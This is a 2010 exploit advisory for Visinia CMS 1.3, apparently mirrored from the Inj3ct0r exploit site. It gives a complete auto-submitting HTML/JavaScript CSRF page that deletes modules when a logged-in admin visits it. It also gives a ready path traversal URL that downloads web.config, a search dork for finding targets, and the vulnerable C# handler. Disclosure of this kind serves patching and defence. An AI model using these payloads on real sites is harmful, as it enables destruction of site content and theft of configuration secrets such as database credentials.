Home / os / win7

Visinia 1.3 Multiple Vulnerabilities

Posted on 03 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Visinia 1.3 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================
Visinia 1.3 Multiple Vulnerabilities
====================================


  Title            :  Visinia Multiple Vulnerabilities
  Affected Version :  Visinia 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.visinia.com/
  Download Links   :  http://visinia.codeplex.com/releases
  Dork             :  &quot;Powered by visinia&quot;
               
  Admin Page       :  http://Example.com/Login.aspx
  
Description :
===========================================================================================     
  This version of Visinia have Multiple Valnerabilities :
 
        1- CSRF for Remove Modules
    2- LFI for download web.config or any file
 
 
 
CSRF for Remove Modules:
===========================================================================================    
 
  With this vulnerability you can navigate the admin to visit malicious  site (when he is already logged in)
  to remove a Module with a POST request to server.
 
  In this path the Module will be removed:
         http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&amp;ModuleId=159  
 
  for removing other modules you need to just change ModuleId.
  
  
  The Source of HTML Page (Malicious  script) is here:
  ----------------------------------------------------------------------------------------
&lt;html&gt;
&lt;head&gt;
&lt;title &gt;Wellcome to My Site!&lt;/title&gt;
Hello!
...
...
...
This page remove Modules in Visinia CMS.
 
&lt;script&gt;         
        function RemoveModule() {           
            try {
                netscape.security.PrivilegeManager.enablePrivilege(&quot;UniversalXPConnect&quot;);
            } catch (e) {}
 
            var http = false;
            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);               
            }
 
            url = &quot;http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&amp;ModuleId=159&quot;;
            http.onreadystatechange = done;
            http.open('POST', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 &amp;&amp; http.status == 200)
            {              
            }
        }    
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload =&quot;RemoveModule();&quot;&gt;
&lt;/body&gt;
&lt;/html&gt;
 
  ----------------------------------------------------------------------------------------
 
 
File Disclosure Vulnerability:
===========================================================================================    
 
  using this path you can download web.config file from server.
         http://Example.com/image.axd?picture=viNews/../../web.config
   
  The downloaded file is image.axd, while after downloading you find that the content of
  image.axd is web.config.
 
  Vulnerable Code is in this DLL    : visinia.SmartEngine.dll
  and this Method : ProcessRequest(HttpContext context)
 
  --------------------------------------------------------------------
   public void ProcessRequest(HttpContext context)
   {
    if (!string.IsNullOrEmpty(context.Request.QueryString[&quot;picture&quot;]))
    {
        string fileName = context.Request.QueryString[&quot;picture&quot;];     // Give the file from URL
        string folder = WebRoots.GetResourcesRoot();
        try
        {
            FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName);
            int index = fileName.LastIndexOf(&quot;.&quot;) + 1;
            string extension = fileName.Substring(index).ToLower();
            if (string.Compare(extension, &quot;jpg&quot;) == 0)
            {
                context.Response.ContentType = &quot;image/jpeg&quot;;
            }
            else
            {
                context.Response.ContentType = &quot;image/&quot; + extension;
            }
            context.Response.TransmitFile(fi.FullName);              // Put the file in 'Response' for downloading without any check
        }
        catch
        {
        }
    }
   }


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :